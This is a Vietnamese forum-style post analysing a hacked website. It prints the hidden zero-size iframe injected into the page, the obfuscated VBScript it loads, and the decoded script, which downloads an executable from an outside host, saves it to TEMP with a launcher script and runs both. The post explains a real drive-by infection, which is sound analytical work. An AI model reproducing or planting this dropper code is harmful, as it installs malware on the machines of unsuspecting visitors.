NAM GIÀ

Hờ, sau một hồi xem xét thì đoán chắc là 99% website này đã bị hack bởi các hacker Trung Quốc
Có thể kiểm chứng bằng cách mở source của trang web và nhìn vào dòng cuối cùng:

<IfRAME height=0 width=0 sRc="http://www.852599.cn/mp3/script.htm"></IFrAME>

Đoạn code này nhúng một trang web ẩn khác xuất phát từ Trung Quốc (height=0 và width=0 nên người dùng không thể nhìn thấy), nội dung trang này như sau:

<script LANGUAGE="VBScript">
function rechange(k)
s=Split(k,Chr( 44))
t=""
For i = 0 To UBound(s)
kellav=eval(s(i))
t=t+Chr(kellav)
Next
rechange=t
End Function
t="68,105,109,32,86,103,103,121,85,86,102,111,103,78,99,118,81,105,100,84,121,72,73,71,76,119,112,119,97,110,109,68,72,75,66,97,112,105,83,65,67,88,122,69,83,99,119,76,120,107,76,104,103,84,113,73,116,120,88,120,84,68,86,83,111,76,103,98,88,103,66,80,107,89,104,70,65,100,102,77,103,108,116,103,80,89,89,87,98,121,71,78,114,69,69,84,88,97,83,113,71,121,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,97,86,75,101,86,61,34,104,116,116,112,58,47,47,119,119,119,46,56,53,50,53,57,57,46,99,110,47,109,112,51,47,115,101,116,117,112,49,48,55,50,46,101,120,101,34,13,10,83,101,116,32,122,79,89,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,122,79,89,46,83,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,79,79,66,110,80,108,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,112,34,13,10,83,101,116,32,87,107,83,32,61,32,122,79,89,46,67,114,101,97,116,101,79,98,106,101,99,116,40,79,79,66,110,80,108,44,34,34,41,13,10,87,107,83,46,79,112,101,110,32,34,71,69,84,34,44,32,97,86,75,101,86,44,32,70,97,108,115,101,13,10,87,107,83,46,83,101,110,100,13,10,69,120,101,78,97,109,101,61,34,108,72,119,110,67,77,117,117,104,85,117,82,101,115,46,99,111,109,34,13,10,86,98,115,78,97,109,101,61,34,90,113,100,104,72,117,115,109,70,67,89,117,84,90,46,118,98,115,34,13,10,83,101,116,32,70,80,73,32,61,32,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,83,101,116,32,115,84,109,112,32,61,32,70,80,73,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,69,120,101,78,97,109,101,61,70,80,73,46,66,117,105,108,100,80,97,116,104,40,115,84,109,112,44,69,120,101,78,97,109,101,41,13,10,86,98,115,78,97,109,101,61,70,80,73,46,66,117,105,108,100,80,97,116,104,40,115,84,109,112,44,86,98,115,78,97,109,101,41,13,10,65,65,61,34,65,100,34,13,10,65,66,61,34,111,100,98,46,115,116,114,101,97,109,34,13,10,65,100,77,61,65,65,38,65,66,13,10,100,100,100,61,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,13,10,83,101,116,32,68,112,116,32,61,32,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,40,65,100,77,44,34,34,41,13,10,68,112,116,46,116,121,112,101,61,49,13,10,68,112,116,46,79,112,101,110,13,10,68,112,116,46,87,114,105,116,101,32,87,107,83,46,82,101,115,112,111,110,115,101,66,111,100,121,13,10,68,112,116,46,83,97,118,101,116,111,102,105,108,101,32,69,120,101,78,97,109,101,44,50,13,10,68,112,116,46,67,108,111,115,101,13,10,68,112,116,46,84,121,112,101,61,50,13,10,68,112,116,46,79,112,101,110,13,10,68,112,116,46,87,114,105,116,101,84,101,120,116,32,34,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,34,38,118,98,67,114,76,102,38,34,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,34,87,115,99,34,34,32,38,32,34,34,114,105,112,34,34,32,38,32,34,34,116,46,83,104,101,108,108,34,34,41,34,38,118,98,67,114,76,102,38,34,83,104,101,108,108,46,82,117,110,32,40,34,34,34,38,69,120,101,78,97,109,101,38,34,34,34,41,34,38,118,98,67,114,76,102,38,34,83,101,116,32,83,104,101,108,108,32,61,32,78,111,116,104,105,110,103,34,13,10,68,112,116,46,83,97,118,101,116,111,102,105,108,101,32,86,98,115,78,97,109,101,44,50,13,10,68,112,116,46,67,108,111,115,101,13,10,115,82,117,110,61,34,83,104,101,108,108,46,65,112,112,108,105,34,13,10,83,101,116,32,82,117,110,32,61,32,122,79,89,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,82,117,110,38,34,99,97,116,105,111,110,34,44,34,34,41,13,10,82,117,110,46,83,104,101,108,108,69,120,101,99,117,116,101,32,86,98,115,78,97,109,101,44,34,34,44,34,34,44,34,79,112,101,110,34,44,48"
execute(rechange(t))
</Script>
<iframe height=0 width=0 src="http://www.852599.cn/mp3/Top1.htm"></iframe>

Sau khi giải mã xong, đoạn lệnh được mã hóa ở trên đã hiện nguyên hình:

Dim VggyUVfogNcvQidTyHIGLwpwanmDHKBapiSACXzEScwLxkLhgTqItxXxTDVSoLgbXgBPkYhFAdfMgltgPYYWbyGNrEETXaSqGy
On Error Resume Next
aVKeV="http://www.852599.cn/mp3/setup1072.exe"
Set zOY = document.createElement("object")
zOY.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
OOBnPl="Microsoft.XMLHTTp"
Set WkS = zOY.CreateObject(OOBnPl,"")
WkS.Open "GET", aVKeV, False
WkS.Send
ExeName="lHwnCMuuhUuRes.com"
VbsName="ZqdhHusmFCYuTZ.vbs"
Set FPI = zOY.createobject("Scripting.FileSystemObject","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="Ad"
AB="odb.stream"
AdM=AA&AB
ddd=zOY.createobject
Set Dpt = zOY.createobject(AdM,"")
Dpt.type=1
Dpt.Open
Dpt.Write WkS.ResponseBody
Dpt.Savetofile ExeName,2
Dpt.Close
Dpt.Type=2
Dpt.Open
Dpt.WriteText "on error resume next"&vbCrLf&"Set Shell = CreateObject(""Wsc"" & ""rip"" & ""t.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"Set Shell = Nothing"
Dpt.Savetofile VbsName,2
Dpt.Close
sRun="Shell.Appli"
Set Run = zOY.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0

Đoạn lệnh trên khi được thực thi sẽ tạo một đối tượng XMLHttp để lấy về file

http://www.852599.cn/mp3/setup1072.exe

, sau đó ghi vào hai file lHwnCMuuhUuRes.com và ZqdhHusmFCYuTZ.vbs trong thư mục TEMP rồi thực thi hai file này